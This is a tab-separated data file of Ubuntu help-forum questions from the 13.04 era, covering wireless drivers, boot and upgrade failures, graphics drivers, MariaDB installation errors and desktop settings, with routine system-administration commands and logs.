286380	wireless card problem rtl8192se autodisconnects after a few minutes in 13.04	i am using wireless card rtl8192se . the official site of realtek provided a driver that supports kernel up to 3.2.x but recently i upgraded to 13.04 so i can not use it . initially the driver in the kernel works find but after a while it start disconnecting after a few minutes . the signal strength shown in the panel drops from 4/5 to 2 yet if i click open the menu , the strength remains . in the same time , network slows down drastically ( from 100+kb/s to 100b/s ) . only if i disconnect and reconnect will it start to work . but after a few minutes , it appears again . this is not a new problem , but i can not find a solution to that , especially with kernel 3.8.x
286384	how can i run an extracted .exe in wine ?	i have a program called bridgem1 . it is a front-end for the arcade music emulator m1 . i read at the following link ( m1 and .lst files ) that i could use this program in wine . the problem is i 'm not sure how to run it . it did not come with an installer . to run it under windows , you just had to extract the files into a folder and then double-click the .exe to run it . i tried setting the file permission `` allow file to be run as executable '' in properties but when i right-clicked it and ran it with wine windows program launcher , it displayed a window at the bottom of my screen saying `` opening bridgem1.exe '' and then after a few seconds nothing happens . double-clicking the file only displayed a brief terminal window which promptly closed . do i have to extract the file where my wine folder is at ?
286386	upgrading from 12.04 to 12.10 resulted in boot process sticking with `` the disk drive for /dev/mapper/cryptswap1 is not ready or present ''	i just performed an upgrade from 12.04 to 12.10 , and everything seemed to go as expected . as the upgrade was finishing i was asked to restart the computer , which i did . once i restarted , however , the boot process got stuck with the message : '' the disk drive for /tmp is not ready '' i left it for a while and nothing happened , so i restarted the system . this time ( and every single time since ) the boot process now gets stuck with the message : '' the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery '' i 've tried several things so far : 1 ) wait . i 've waited 20+ minutes and nothing happens . after some time it also does n't matter if i press s or m to choose one of the options , nothing happens ( i have to press these quickly if i want to select an option ) . 2 ) choose `` skip '' - all that happens is i see the ubuntu logo screen as if it was booting , but nothing happens . 3 ) choose `` manual recovery '' and it begins to load a maintenance shell ( i think that is what it is doing at least ) but then very quickly the following error appears : '' udevd [ 109 ] : '/sbin/modprobe -bv pci : v00008086d00000116sv0000103csd0000166fbc03sc 00e00 ' [ 156 ] terminated by signal 9 ( killed ) '' once this message appears the system freezes on this screen . i 've searched around online but not found a solution so far .
286387	/opt not found at home in ubuntu 13.04	i tried to install xampp to opt directory using this command : sudo tar xvfz xampp-linux-1.8.0.tar.gz -c /opt but , there is no folder there named /opt when i searched for this folder , there was a folder named /opt under /etc and another folder under /inode . so , where i can install xampp now - in the etc/opt/ or to create a directory named /opt in home ?
286391	ca n't minimize firefox in 13.04 ( livedvd )	largely enjoyed my experience with 64-bit 13.04 from the livedvd - seems quite faster than 12.04 's unity ! however , firefox froze when i minimized it , then kind of tried to 'come back ' after a few seconds of me waiting for it , then froze again . is this at all related to the fact that i was using the livecd/dvd/whatever it 's called now ? and if i can reproduce it , what do i need to relay to the correct individuals ? edit - i see now this is a recognized issue of ubuntu 13.04 - # 1163503 on launchpad . since i prefer chromium on ubuntu i have my workaround , and i see that since it is a bug i will not need to keep this post open . thanks for being helpful , everyone .
286392	installed kubuntu on a usb stick , want to go back to windows	i am running windows 8 , i installed kubuntu on a usb stick . now when i remove usb stick i get an error `` no such device exists '' , i want to get rid of kubuntu and this error . i am not linux user so please tell me an easy way to do that . thank you
286393	how do you change the dash icon in 13.04 ?	now i ask this and i consider it distinct in that the related question how to change the dash icon in the unity launcher ? is about old ubuntu versions like 11.10 this one is specifically for 13.04 .
286398	how can i solve performance problems of ubuntu 13.04 ?	i was using 12.04 . i upgraded to 12.10 and then to 13.04 on the day 13.04 was released . i have also installed gnome 3.8 with gdm . i 'm facing some problems using 13.04 . it takes a lot of time to boot up . almost double than 12.04 . similarly , it takes a lot of time to load the desktop . initially , i was having problems with gnome 3.8.2 ( staging release ) , so i purged those ppas and downgraded to 3.8 . sometimes my sound card does n't work . i also have a 2 gb ati graphics card which i have kept off using vgaswitcheroo . sometimes 13.04 boot up properly . it stops at ubuntu splash screen . sometimes it does n't shut down . i have to manually use init 0 to do that . on startup , i get this message - lis3lv02d no such sensor found . i did n't face any such problems in 12.04 . was there some problem with upgrade ? or ubuntu 13.04 is really buggy ? how can i solve this ?
286403	can/should i upgrade my linux kernel from precise 12.04.2 to raring 13.04 ?	i 'm running 12.04.2 through regular updates . installed 12.04.1 . after 12.04.2 was released i made an upgrade of xserver & linux kernel . so now i 'm running precise with quantal kernel and xserver . what i want to know is if there is a way to do a similar upgrade with the new version . i do n't really want to upgrade my lts version but i would like to improve it a little . if there is a way please would you help me with key steps ? thank you in advance .
286404	12.04.2 i386 gets downloaded instead of 13.04 amd64	i 've been trying to download the latest release from the website , but even though i 'm selecting 13.04 64-bit as my option , the download begins for 12.04.2 32-bit . any ideas as why this is happening ? i 'm downloading on windows 8 in dell inspiron .
286409	strange raid disk volume usage	i have ubuntu server 12.04 , and my disk is full . i do n't know why ; my files do n't use more than 5gb . filesystem size used avail use % mounted on /dev/mapper/isw_dahaajfhdc_sistema2 102g 97g 0 100 % / udev 7,7g 4,0k 7,7g 1 % /dev tmpfs 3,1g 7,2m 3,1g 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 7,7g 0 7,7g 0 % /run/shm none 100m 0 100m 0 % /run/user /dev/mapper/isw_dahaajfhdc_sistema1 94m 123k 94m 1 % /boot/efi /dev/sdc 1,8t 8,8g 1,7t 1 % /disco1 /dev/sdd 1,8t 11g 1,7t 1 % /disco2 /dev/sdf 1,4t 718g 589g 55 % /discofilmes /dev/mapper/isw_dahaajfhdc_sistema2 is full and i really do n't know why . this is a raid disk . what can i do ?
286411	zombie process during start	my laptop ( 12.04 and w7 ) will not start in ubuntu any more . the login screen ( black ) appears after grub . it says . when i enter my name and password i enter `` a terminal '' and i ca n't get any further . the message i get sometimes is that there is a zombie process running . as i try to kill that ( which i ca n't ) and terminate the child ( never thought i would write this down ) nothing happens . can anyone help me out ?
286414	dash transparency does n't look right	well , i do n't know what words to express this problem but here 's the picture.. as you can see , there is a problem with the background opacity of unity ... how to solve this ? ? i 'm using the april 21 daily build image and updated the system since the release of 13.04 ... . i 'm using an hp mini laptop .
286416	inconsistent internet connection device ( eth0 eth1 eth2 )	i 'm running ubuntu 12.04 , and to my knowledge there is only 1 networking card on my machine ( dell laptop ) -- - i ca n't imagine why there would be more than 1 . sometimes my internet connection runs over device eth1 , at other times eth2 . possibly also eth0 at times . i do n't care much which device name is used , but i do care that it always be the same . ( since i always connect wirelessly , i expected the connection to run over a wlanx device based on my experience with ubuntu 10.04 , but , like i said , the name does n't matter as long as it 's consistent ) . running ifconfig returned : eth0 link encap : ethernet hwaddr 5c:26:0a:16 : e4:31 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:22 memory : f6fe0000-f7000000 eth2 link encap : ethernet hwaddr 00:25:56 : b2:16:3e inet addr:192.168.1.78 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :225:56ff : feb2:163e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9970442 errors:1 dropped:0 overruns:0 frame:2735811 tx packets:7466676 errors:501 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1991253521 ( 1.9 gb ) tx bytes:594939490 ( 594.9 mb ) interrupt:17 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2634 errors:0 dropped:0 overruns:0 frame:0 tx packets:2634 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:287326 ( 287.3 kb ) tx bytes:287326 ( 287.3 kb ) the contents of /etc/network/interfaces were : auto lo iface lo inet loopback after running ifconfig and viewing the contents of /etc/network/interfaces , i edited /etc/network/interfaces and entered # /etc/init.d/networking restart now , the contents of /etc/network/interfaces are : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp and running ifconfig now returns ( where xxx.xxx.xxx.xxx and yyy.yyy.yyy.yyy are not the actual addresses ) : eth0 link encap : ethernet hwaddr 5c:26:0a:16 : e4:31 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:22 memory : f6fe0000-f7000000 eth2 link encap : ethernet hwaddr 00:25:56 : b2:16:3e inet addr:192.168.1.78 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :225:56ff : feb2:163e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10329105 errors:1 dropped:0 overruns:0 frame:2751349 tx packets:7712653 errors:609 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2531013388 ( 2.5 gb ) tx bytes:614377694 ( 614.3 mb ) interrupt:17 base address:0xc000 eth0 : avahi link encap : ethernet hwaddr 5c:26:0a:16 : e4:31 inet addr : xxx.xxx.xxx.xxx bcast : yyy.yyy.yyy.yyy mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 interrupt:22 memory : f6fe0000-f7000000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2751 errors:0 dropped:0 overruns:0 frame:0 tx packets:2751 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:303844 ( 303.8 kb ) tx bytes:303844 ( 303.8 kb ) so , my question is : do the changes i made to /etc/network/interfaces have the effect of forcing the internet connection always to be run over device eth0 , or at least always to be aliased by device eth0 ? if not , then after undoing my changes to /etc/network/interfaces , what can i do so that i can always refer to the internet connection device as eth0 ? [ added below in response to request . ] the contents of /etc/udev/rules.d/70-persistent-net.rules are : # this file was automatically generated by the /lib/udev/write_net_rules # program , run by the persistent-net-generator.rules rules file . # # you can modify it , as long as you keep each rule on a single # line , and change only the value of the name= key . # pci device 0x8086 : /sys/devices/pci0000:00/0000:00:19.0 ( e1000e ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 5c:26:0a:16 : e4:31 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.1/0000:0c:00.0/ssb0:0 ( b43-pci-bridge ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:25:56 : b2:16:3e '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.1/0000:0c:00.0 ( wl ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:25:56 : b2:16:3e '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.1/0000:0c:00.0 ( wl ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:25:56 : b2:16:3e '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth2 ''
286430	nautilus 3.6 does n't have a status bar ?	in 12.04 , nautilus showed the amount of remaining space in the status bar , but as of 13.04 the status bar is gone . gsettings set org.gnome.nautilus.window-state start-with-status-bar true turned out `` no such key '' . is there any way to bring back the status bar ?
286433	mythbuntu-control-centre fails to run on xubuntu 13.04	when mythbuntu-control-centre is installed on xubuntu 13.04 , it generates the following error immediately after it is executed from the command line : **royg @ mythtv : ~ $ mythbuntu-control-centre traceback ( most recent call last ) : file `` /usr/bin/mythbuntu-control-centre '' , line 40 , in < module > from aptdaemon.gtkwidgets import ( apterrordialog , importerror : can not import name aptmessagedialog** when it is executed from the settings manager - system dialog box , nothing appears to happen .
286434	i have windows 7 on a 1tb hdd and i have installed ubuntu on 240gb ocz ssd	boot info script i run boot-repair as i can not boot up ubuntu . it suggested using gparted ? i want to be able to boot up my computer and choose either windows or linux everytime . i used easybcd to add linux but then when i run it at bootup is comes up with : gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . alternatively , you can retry after activating the [ separate /boot/efi partition : ] option . =================== advice displayed in case of recommended repair
286435	can i install old packages on newer version of ubuntu ?	i installed ubuntu 13.04 yesterday . i want to know whether i can install the packages i downloaded previously , on this version of ubuntu . will it cause any problems ?
286442	additional drivers for my nvidia 680gtx not showing up in the additional drivers tool	did a fresh 13.04 install `` additional drivers '' doesnt show anything at all . was working fine on ubuntu 12.04 . i have 2 nvidia cards installed 680gtx and 460gtx both detected on lspci , currently my system looks like its running on the nouveau driver ( gallium 0.4 on nve4 ) 01:00.0 vga compatible controller : nvidia corporation gk104 [ geforce gtx 680 ] ( rev a1 ) 02:00.0 vga compatible controller : nvidia corporation gf104 [ geforce gtx 460 ] ( rev a1 ) any ideas on how to fix it ?
286448	upgrade 12.10 ( gnome installer ) to 13.04 ( gnome )	i have installed clean ubuntu with gnome desktop environment ( this was installer only with gnome so no unity and not upgraded from unity to gnome ) . and i 'm very happy with it , but there is a system massage that tells me there is an update to 13.04 . ok thats cool , but if i press upgrade will it upgrade everything ok , and keep my gnome ? or it will upgrade and install unity and mix up my whole installation . i 've read that its not very good to have both gnome and unity or to `` upgrade '' from one to another . it 's always better to just clean install the one you like . so my question is : if i upgrade my ubuntu 12.10-gnome will it keep it ( the gnome ) or it will install unity and its going to be a big mess ... ? thanks
286451	compiling hhvm - how to add libpthread to linker ?	i am trying to compile hiphop vm on ubuntu 13.04 and i have this error message : linking cxx executable gen-ext-hhvm /usr/bin/ld : ../../../bin/libfolly.a ( exceptiontracerlib.cpp.o ) : undefined reference to symbol 'pthread_once @ @ glibc_2.2.5' /usr/bin/ld : note : 'pthread_once @ @ glibc_2.2.5 ' is defined in dso /lib/x86_64-linux-gnu/libpthread.so.0 so try adding it to the linker command line i 've tried to add something like target_link_libraries ( { $ target } /lib/x86_64-linux-gnu/libpthread.so.0 ) in cmake/hphpfindlibs.cmake but without success . what and where should i add to make it working ?
286452	black screen when upgrading 12.10 to 13.04	i will explain what i have done . booted my pc using a live-disk and upgraded my system . first it booted normaly but i saw it was using nouveau and i would my nvidea drivers back . installed the drivers from xorg/eders and got a black screen and not able to run any tty . i booted with my old 12.10 kernel tried installed some things that may missed . yeah i got it boot , i rebooted it just for being sure and it also worked good . next morning when i boot my pc i got black screen an no my ubuntu seems to be death at all . i simply not understand how a pc can change it configuration even when it is turned off ? ? ? or is my gpu died ? some information of my pc : - toshiba sattelite 660 - gpu 350m
286454	ca n't install amd catalyst drivers on 13.04	i recently installed ubuntu 13.04 on a system with an amd apu ( a6-5400k ) . the unity sidebar was flickering and i had had this problem before , and installing the amd catalyst drivers fixed it ( under 12.04.2 ) . under 13.04 , when i try installing catalyst 13.4 ( what a coincidence ) it says it is not an executable when i run the .run file using sudo sh or by making it executable under properties . it is to the point of unusable as i am planning to play a few games on it . can anyone point me in the direction of good open source drivers or how i can install the proprietary drivers ? i am relatively new to linux .
286460	downgrade qt in ubuntu 13.04	i use ubuntu 13.04 . does anybody know how to downgrade qt to the version 4.8.2 ?
286462	13.04 not leaving any efibootmgr entries	i made a clean install of 13.04 from a flash drive , but after a reboot the only uefi boot options i have are the basic efi shell entries and the flash drive again - there 's simply no entry for 13.04 . so the first thing i did was boot up the live enviroment with the flash drive , chroot into the 13.04 install and work it out with grub-efi and efibootmgr . first thing i notice , copying the resolv.conf doesnt seem to give me wifi-access in the chroot enviroment . second thing , trying to create a new efibootmgr entries doesnt do anything - i 've tried a few bogus entries , but the verification always only shows me the default efi shell entries . so my main question is : did they change anything about efibootmgr ? did anyone else manage to get 13.04 to boot up with uefi ? ps : this pretty much shows what commands i used if thats helpful . and this seems to indicate the problem existed in the beta release .
286463	multiarch and architecture : all packages	i have a problem with multiarch : i installed ubuntu 13.04 amd64 and it works well . unfortunately i have a philips lasermfd 6020 printer/scanner and for the scanner part it has only a proprietary i386 linux driver . to use it , i tried a multiarch installation : i installed sane : i386 ( apt-get install sane : i386 ) for xscanimage , and it works well i tried to install the more comfortable simple-scan : i386 and xsane : i386 , but i ca n't : both has an unmet dependencies ( xsane-common : i386 and gnome-icon-theme : i386 ) . it is true , there is no such a package as xsane-common : i386 because xsane-common is for all architecture . is there any way to install an i386 package with dependencies to architecture : all packages without broke the package management ?
286464	how to get running out of space warning earlier ?	i 'm running 12.04 and my file system and /home are both on a rather small 120gb ssd . they need to be there , because my principal daily activity is compiling phone roms , and that takes forever if i do that on sata2 drives . the problem is , compiling takes up a lot of space ; i can build 2 roms comfortably , but then have to do a make clobber ( delete the compiling output ) in order to start the subsequent builds . of course , sometimes i forget to do this , get the warning that i 'm running out of space , but by then it 's too late - the third build had already aborted because the compiler could n't write the output . the only thing to do in that case is to delete the previous builds and start over from scratch . is there any way to make the system warn me about low space when there 's , say , 5gbs left , instead of just 1gb ? that way i could have time to get rid of the previous builds before the compiler gives up .
286465	ubuntu gnome 13.04 in virtualbox 4.2.12	i 'm trying to install ubuntu gnome 13.04 in virtualbox ( 4.2.12 ) on a windows host . initial installation works but after installing guest additions , virtualbox always crashes during login . i tried to install gueset additions via the additonal driver menu and compiling it from the virtualbox provided iso . same problem . i also tried to install lubuntu 13.04 and install gnome shell via apt . same problem . 32 or 64bit version . same problem . i also tried the previous version of virtualbox . same probleme . tried to install gnome 3.8 from ppa . same problem . how can i use ubuntu gnome 13.04 in virtualbox ? update : i unchecked the 3d accaleration option in the vm settings . virtualbox no longer crashes but i keep getting a dialog box saying that a system application failed the error reporting preview says : excecutablepath : usr/bin/gnome-shell problemtype : crash title : gnome-shell crashed with sigsegv
286467	sh : 0 : getcwd ( ) failed : no such file or directory	i am trying to compile arm code in ubuntu 12.04 . everything is working fine when i put my code in local directory . but when i put the code in cited mount directory this error happens : sh : 0 : getcwd ( ) failed : no such file or directory sh : 0 : getcwd ( ) failed : no such file or directory here is my mount command : sudo mount -t cifs -o username=wx , passwd=wx , auto , nounix , noserverino , file_mode=0777 , dir_mode=0777 , uid=user , gid=users , noperm , rw , uid=1002 , gid=1002 //192.165.54.18/prj_9330 /home/dongjw/work_dir/work_9330 i am using ubuntu 12.04 64bit what would cause this error ?
286471	how do we get traditional ubuntu windows buttons ?	after having installed ubuntu gnome remix we only have a windows close button on the top right corner : from ubuntu/unity i got used to have the windows button on the left side including minimize and maximize buttons . how can i get this layout in ubuntu gnome remix ?
286473	canon lbp2900b installation in 11.10	i need to install the canon lbp2900b printers into my ubuntu machines using 11.10 version . i have tried most of the queries online but could not able to find a solution for this issue . so could any body help me on this . and i need to share the printer as well on to other machines . so could some body help me on this i have tried to follow these instructions but it didnot worked for me https : //help.ubuntu.com/community/canoncaptdrv190
286476	ca n't install mariadb 5.5 or 10 in ubuntu 12.04 . mysqld failed to start ?	i tried o install mariadb on my ubuntu 12.04 server . first it gave dependency issues and i fixed it by following this question : http : //stackoverflow.com/questions/16214517/installing-mariadb-unmet-dependencies-mariadb-server-5-5 but when installing mariadb-server , it fails to start the mysqld . here is the apt log : root @ sinha : /etc/apt # sudo apt-get install mariadb-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libdbd-mysql-perl libmariadbclient18 libmysqlclient18 mariadb-client-10.0 mariadb-client-core-10.0 mariadb-common mariadb-server-10.0 mariadb-server-core-10.0 mysql-common suggested packages : tinyca mailx mariadb-test the following new packages will be installed : libdbd-mysql-perl libmariadbclient18 mariadb-client-10.0 mariadb-client-core-10.0 mariadb-common mariadb-server mariadb-server-10.0 mariadb-server-core-10.0 the following packages will be upgraded : libmysqlclient18 mysql-common 2 upgraded , 8 newly installed , 0 to remove and 0 not upgraded . need to get 30.8 mb of archives . after this operation , 105 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mysql-common all 10.0.1-mariadb1~precise [ 8,826 b ] get:2 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-common all 10.0.1-mariadb1~precise [ 3,304 b ] get:3 http : //lk.archive.ubuntu.com/ubuntu/ precise/main libdbd-mysql-perl amd64 4.020-1build2 [ 106 kb ] get:4 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main libmariadbclient18 amd64 10.0.1-mariadb1~precise [ 846 kb ] get:5 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main libmysqlclient18 amd64 10.0.1-mariadb1~precise [ 2,956 b ] get:6 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-client-core-10.0 amd64 10.0.1-mariadb1~precise [ 1,814 kb ] get:7 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-client-10.0 amd64 10.0.1-mariadb1~precise [ 5,103 kb ] get:8 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-server-core-10.0 amd64 10.0.1-mariadb1~precise [ 5,517 kb ] get:9 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-server-10.0 amd64 10.0.1-mariadb1~precise [ 17.4 mb ] get:10 http : //mirrors.supportex.net/mariadb/repo/10.0/ubuntu/ precise/main mariadb-server all 10.0.1-mariadb1~precise [ 2,992 b ] fetched 30.8 mb in 1s ( 17.0 mb/s ) preconfiguring packages ... ( reading database ... 119368 files and directories currently installed . ) preparing to replace mysql-common 5.5.31-0ubuntu0.12.04.1 ( using ... /mysql-common_10.0.1-mariadb1~precise_all.deb ) ... unpacking replacement mysql-common ... selecting previously unselected package mariadb-common . unpacking mariadb-common ( from ... /mariadb-common_10.0.1-mariadb1~precise_all.deb ) ... selecting previously unselected package libmariadbclient18 . unpacking libmariadbclient18 ( from ... /libmariadbclient18_10.0.1-mariadb1~precise_amd64.deb ) ... preparing to replace libmysqlclient18 5.5.31-0ubuntu0.12.04.1 ( using ... /libmysqlclient18_10.0.1-mariadb1~precise_amd64.deb ) ... unpacking replacement libmysqlclient18 ... selecting previously unselected package libdbd-mysql-perl . unpacking libdbd-mysql-perl ( from ... /libdbd-mysql-perl_4.020-1build2_amd64.deb ) ... selecting previously unselected package mariadb-client-core-10.0 . unpacking mariadb-client-core-10.0 ( from ... /mariadb-client-core-10.0_10.0.1-mariadb1~precise_amd64.deb ) ... selecting previously unselected package mariadb-client-10.0 . unpacking mariadb-client-10.0 ( from ... /mariadb-client-10.0_10.0.1-mariadb1~precise_amd64.deb ) ... selecting previously unselected package mariadb-server-core-10.0 . unpacking mariadb-server-core-10.0 ( from ... /mariadb-server-core-10.0_10.0.1-mariadb1~precise_amd64.deb ) ... processing triggers for man-db ... setting up mysql-common ( 10.0.1-mariadb1~precise ) ... installing new version of config file /etc/mysql/my.cnf ... setting up mariadb-common ( 10.0.1-mariadb1~precise ) ... selecting previously unselected package mariadb-server-10.0 . ( reading database ... 119534 files and directories currently installed . ) unpacking mariadb-server-10.0 ( from ... /mariadb-server-10.0_10.0.1-mariadb1~precise_amd64.deb ) ... selecting previously unselected package mariadb-server . unpacking mariadb-server ( from ... /mariadb-server_10.0.1-mariadb1~precise_all.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... setting up libmysqlclient18 ( 10.0.1-mariadb1~precise ) ... setting up libdbd-mysql-perl ( 4.020-1build2 ) ... setting up libmariadbclient18 ( 10.0.1-mariadb1~precise ) ... setting up mariadb-client-core-10.0 ( 10.0.1-mariadb1~precise ) ... setting up mariadb-client-10.0 ( 10.0.1-mariadb1~precise ) ... setting up mariadb-server-core-10.0 ( 10.0.1-mariadb1~precise ) ... setting up mariadb-server-10.0 ( 10.0.1-mariadb1~precise ) ... * stopping mariadb database server mysqld [ ok ] 130427 13:43:14 [ note ] plugin 'innodb ' is disabled . 130427 13:43:14 [ note ] plugin 'feedback ' is disabled . * starting mariadb database server mysqld [ fail ] invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mariadb-server-10.0 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mariadb-server : mariadb-server depends on mariadb-server-10.0 ; however : package mariadb-server-10.0 is not configured yet . dpkg : error processing mariadb-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mariadb-server-10.0 mariadb-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) tried re installing mariadb-server , purged everything ... removed mysql packages , installed mariadb-server-5.5 ... nothing works .
286479	installing ubuntu 13.04 after installing windows 8	i have made a bootable usb installation of ubuntu 13.04 using pendrive linux . i also have windows 8 on separate partition . after i finished installing ubuntu 13.04 from the usb , it went straight to windows 8 without grub showing to ask me to select an operating system , how can i fix this ? i do n't have uefi or secure boot .
286480	how do i make pidgin display its system tray icon on 13.04 ?	pidgin 's page in software center says i should install one of gnome-panel or kdebase-workspace-bin or docker to achieve this . i installed docker but nothing happened . needless to say , i have `` show system tray icon '' set to `` always '' in pidgin 's preferences . this is not a duplicate question , because the ubuntu 12.10 recipe does n't apply to 13.04 i said , this question is not a duplicate . i 'm saying it again : dconf-editor does n't show the parameters that the answer on the other question says i should edit . because this here question refers to 13.04 , and not to versions up to 12.10 .
286485	/dev/sg1 is not a block device	i am on 11.10 and my cdrom is not accessible . wodim -devices gives me this : geso @ saigonpc : ~ $ wodim -- devices wodim : overview of accessible drives ( 2 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'plds ' 'dvd+-rw ds-8a8sh' 1 dev='/dev/sg3 ' rwrw -- : 'huawei ' 'mass storage' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - on trying to mount the cd-rom it returns the is not a block device error . any ideas ?
286486	tile transparent images with graphicsmagic	i 'm glueing together png images with graphicsmagick with this command : gm montage -geometry 450x338+0+0 $ cesta $ i/ $ j/*.png $ cesta $ i/ $ j.png it works but no alpha is present , i tried to change parameters what i 've found on their website but none worked for me . could you help me ? if you know command with imagemagick , ill live too : )
286488	how do i get the wireless working on an hp pavilion dv6 ?	i got a hp pavilion dv6 which has a broadcom wifi module which worked fine the day before i upgraded to 13.04 ( kubuntu ) . the driver is still installed and it tries to establish a connection ( all wifi networks around are correctly detected ) . however , i can not further than `` setting up network address '' .
286490	thinkpad x1 carbon - terrible battery life on raring	two days ago my new thinkpad x1 carbon arrived . it reportedly has `` up to 8.2 hours of battery life '' . i installed 13.04 raring ringtail ( x64 ) on it a day after it was released , and then gnome-shell . now , with wireless , mobile internet and bluetooth all turned off , and screen brightness reduced , it reported 3 hours of batter life at 100 % , and given how quickly it 's decreasing that seems to be accurate . results i got from googling : no-one on this forum question mentioned issues with battery life ... someone suggested that ubuntu might not manage the fan properly ( although i have n't noticed excessive noise ) so i installed thinkfan including running sensors-detect as suggested under `` troubleshooting '' . some else recommended some special grub boot options , but i did n't understand them and in the comments someone suggested they might no longer be necessary i 'm going to try rebooting into windows now to see if it performs better . if it does n't i 'll contact lenovo support and call it a hardware issue - and of course update this question .
286491	how to install a program ending in `` .run '' using terminal	i am following how to install amd ati radeon graphics hd 6770m on ubuntu 13.04 64bit but at step no 5. i do n't know how to do it 5 - install catalyst driver , type the following commands on terminal : cd ~/downloads chmod +x amd-catalyst-13.4-linux-x86.x86_64.run sudo sh amd-catalyst-13.4-linux-x86.x86_64.run this file in the downloads spot how can i use this command to install it because i ca n't run it as execute as program
286492	how to switch off devices and ports for power saving in lubuntu ?	in windows vista i can switch off via power management : pci express modem port optical dvd drive via network connection i disable : blutooth how can i do similar in lubuntu ? under power manager i do n't have the options . it would be good to have a gui manager for this .
286501	no wallpaper after installing gnome shell [ 13.04 ]	after installing gnome shell 3.8 , my wallpaper disapear and i see only white space on desktop . after nautilus -q white turn into black , but i still ca n't see picture ( picture is set correctly , because i see it on login screen ) . problem is in unity as well as in gnome shell . every key in dconf ( org/gnome/nautilus/desktop ) is set to default .
286506	how to setup high contrast theme in lubuntu ?	i ca n't find a high contrast theme via `` customise look and feel '' . this is something similar to the high contrast theme in ms windows .
286513	upgrade to 13.04 fails with a `` attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options ' ''	when i try to upgrade from 12.10 to 13.04 i get this error : checking for a new ubuntu release traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 145 , in < module > fetcher.run_options += [ `` -- mode= % s '' % options.mode , attributeerror : type object 'distupgradefetchercore ' has no attribute 'run_options' can anyone help ? thank you .
286516	how do i get the brightness control working on a lenovo yoga 13 ?	brightness control does n't work by default in ubuntu 13.04 . solution for 12.10 does n't work , also as this any idea how to fix it ? update : after research i found how to change brightness manually . what need to do is to type in terminal : echo 2000 | sudo tee /sys/class/backlight/intel_backlight/brightness it will reduce brightness by half , but still would be good to find solution which will allow to use keyboard for changing brightness . update2 : found solution , see below
